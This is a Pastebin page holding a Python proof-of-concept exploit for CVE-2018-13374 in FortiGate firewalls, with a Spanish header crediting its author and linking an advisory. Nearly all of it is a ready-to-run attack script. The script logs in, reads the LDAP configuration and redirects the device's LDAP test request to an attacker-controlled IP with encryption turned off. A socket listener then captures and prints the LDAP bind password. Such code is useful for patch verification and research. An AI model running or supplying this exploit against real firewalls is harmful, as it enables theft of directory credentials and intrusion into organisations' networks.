Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #/usr/bin/python3
- """
- CVE-2018-13374
- Publicado por Julio Ureña (PlainText)
- Twitter: @JulioUrena
- Blog Post: https://plaintext.do/My-1st-CVE-Capture-LDAP-Credentials-From-FortiGate-EN/
- Referencia: https://fortiguard.com/psirt/FG-IR-18-157
- Ejemplo: python3 CVE-2018-13374.py -f https://FortiGateIP -u usuario -p password -i MiIP
- Ejemplo con Proxy: python3 CVE-2018-13374.py -f https://FortiGateIP -u usuario -p password -i MiIP --proxy http://127.0.0.1:8080
- """
- from threading import Thread
- from time import sleep
- import json, requests, socket, sys, re, click
- # Disable SSL Warning
- requests.packages.urllib3.disable_warnings()
- # To keep the Cookies after login.
- s = requests.Session()
- def AccessFortiGate(fortigate_url, username, password, proxy_addr):
- url_login = fortigate_url+'/logincheck'
- # Pass username and Password
- payload = {"ajax": 1, "username":username, "secretkey":password}
- # verify=False - to avoid SSL warnings
- r = s.post(url_login, data=payload, proxies=proxy_addr, verify=False)
- if s.cookies:
- return True
- else:
- return False
- def TriggerVuln(fortigate_url, ip, proxy_addr):
- print("[+] Triggering Vulnerability")
- # Access LDAP Server TAB
- r = s.get(fortigate_url+'/p/user/ldap/json/',cookies=requests.utils.dict_from_cookiejar(s.cookies), proxies=proxy_addr, verify=False)
- # Load the response in a json object
- json_data = json.loads(r.text)
- # Assign values based on FortiGate LDAP configuration
- name = json_data['source'][0]['name']
- username = json_data['source'][0]['username']
- port = int(json_data['source'][0]['port'])
- cnid = json_data['source'][0]['cnid']
- dn = json_data['source'][0]['dn']
- ca = json_data['source'][0]['ca-cert']
- thread = Thread(target = GetCreds, args = (ip, port))
- thread.start()
- sleep(1)
- print("[+] Username: ", username)
- # Create json object for the vulnerable request, changing the server and setting up secure to 0
- ldap_request = {"info_only":1,"mkey":name,"ldap":{"server":ip,"port":port,"cn_id":cnid,"username":username,"dn":dn,"secure":0,"ca":ca,"type":2}}
- # Trigger the vulnerability
- r = s.get(fortigate_url+'/api/ldap?json='+str(ldap_request), cookies=requests.utils.dict_from_cookiejar(s.cookies),proxies=proxy_addr, verify=False)
- r.close()
- def GetCreds(server, port):
- sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- # Allow to reuse the server/port in case of: OSError: [Errno 98] Address already in use
- sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
- server_address = (server, port)
- sock.bind(server_address)
- sock.listen()
- credentials = ''
- while True:
- print('[+] Waiting Fortigate connection ...')
- c, client_address = sock.accept()
- try:
- while True:
- data = c.recv(1024)
- credentials = str(data)
- # \\x80\\ was common with 3 different passwords / user names, that's why it's been used as reference.
- # It separe the username and the password
- ldap_pass = re.sub(r'.*\\x80\\','',credentials) #.replace("'","")
- print("[+] Password: ", ldap_pass[3:-1])
- break
- finally:
- c.shutdown(socket.SHUT_RDWR)
- c.close()
- sock.shutdown(socket.SHUT_RDWR)
- sock.close()
- if credentials:
- break
- def print_help(self, param, value):
- if value is False:
- return
- click.echo(self.get_help())
- self.exit()
- @click.command()
- @click.option('-f', '--fortigate-url', 'fortigate_url', help='FortiGate URL.', required=True)
- @click.option('-u', '--username', 'username', help='Username to login into Fortigate. It can be a read only user.', required=True)
- @click.option('-p', '--password', 'password', help='Password to login into FortiGate.', required=True)
- @click.option('-i', '--ip', 'ip', help='Host IP to send the credentails.', required=True)
- @click.option('-pr', '--proxy', 'proxy', default=None, help='Proxy protocol and IP and Port.', required=False)
- @click.option('-h', '--help', 'help', help='Help', is_flag=True, callback=print_help, expose_value=False, is_eager=False)
- @click.pass_context
- def main(self, fortigate_url, username, password, ip, proxy):
- if not fortigate_url and not username and not password:
- print_help(self, None, value=True)
- print("[-] For usage reference use --help")
- exit(0)
- # Configure Proxy For Web Requests
- proxy_addr = {
- 'http': proxy,
- 'https': proxy
- }
- message = """[+] CVE-2018-13374
- [+] Publicado por Julio Ureña (PlainText)
- [+] Blog: https://plaintext.do
- [+] Referencia: https://fortiguard.com/psirt/FG-IR-18-157
- """
- print(message)
- if AccessFortiGate(str(fortigate_url),username, password, proxy_addr):
- print("[+] Logged in.")
- sleep(1)
- TriggerVuln(str(fortigate_url), ip, proxy_addr)
- else:
- print("[-] Unable to login. Please check the credentials and Fortigate URL.")
- exit(0)
- if __name__ == "__main__":
- main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement